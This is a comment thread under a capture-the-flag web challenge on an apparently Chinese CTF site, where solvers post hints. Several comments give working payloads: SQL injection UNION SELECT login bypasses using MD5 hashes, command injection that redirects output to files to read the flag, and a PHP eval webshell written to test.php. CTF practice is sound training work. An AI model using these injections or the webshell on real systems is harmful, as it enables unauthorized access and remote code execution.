评分(14)
解题动态
VCD 攻破了该题 2小时前
sysgeyshell 攻破了该题 17小时前
C071 攻破了该题 1天前
花猫咪 攻破了该题 1天前
New_wl 攻破了该题 2天前
qqai 攻破了该题 2天前
wauo3 攻破了该题 2天前
Fulucky 攻破了该题 3天前
asphuyu 攻破了该题 3天前
123佳 攻破了该题 5天前
青春小豆 攻破了该题 5天前
niubill 攻破了该题 5天前
xong_bai 攻破了该题 6天前
guanyunyao 攻破了该题 6天前
西红柿dun牛腩 攻破了该题 6天前
yt430u 攻破了该题 6天前
Mr.Cyber 攻破了该题 7天前
小石 攻破了该题 8天前
告别の记忆 攻破了该题 9天前
评论
19957910119 1年前
举报
1&&echo '<?php @eval($_POST['shell']);phpinfo();?>'>test.php
ctfer-pls 1年前
举报
看了评论厉害了
ilovevicky99 1年前
举报
用反弹shell的方法,为什么没有回显呀
zhuizhui 1年前
举报
' UNION SELECT 'admin' , '99754106633f94d350db34d548d6091a' FROM DUAL;#-- 123;cat /flag > test
xxsko 1年前
举报
学会了一个英语单词tip提示
zpxlz 10月前
举报
那很会学习了
DoubleUUU 1年前
举报
一顿sqlmap半小时,deepseek秒给payload:username = ' UNION SELECT &quot;admin&quot;,&quot;202cb962ac59075b964b07152d234b70&quot; -- &amp;password = 123
liuguowang75 1年前
举报
登陆后,在检验窗口中输入:123 | ls / > a.txt ,可以看到用户目录中所有文件,
sunset2004 1年前
举报
username=admin' union select 1,md5(123)#&password=123,union生成临时表将md5后的123到表里,然后密码输入123即可绕过。RCE直接通过重定向符号即可,将无回显的结果保存到a.txt里即可,123 | cat ../../../../flag > a.txt
Zhou_re-pwn 1年前
举报
没太看懂这题出的啥意思,进入监控系统后,和wp的绕过一模一样,结果回显没有显示
Yoruko39 1年前
举报
sql注入+RCE,但主要是代码审计,进入命令界面后,发现可以用;截断执行命令,但无回显。 可以用重定向符,将执行结果输出到文件中,再访问/a.txt即可,例如可以;cat * > a.txt,此时可以看到当前目录下所有文件,审计发现flag在一个宏变量$FLAG里,echo到文件即可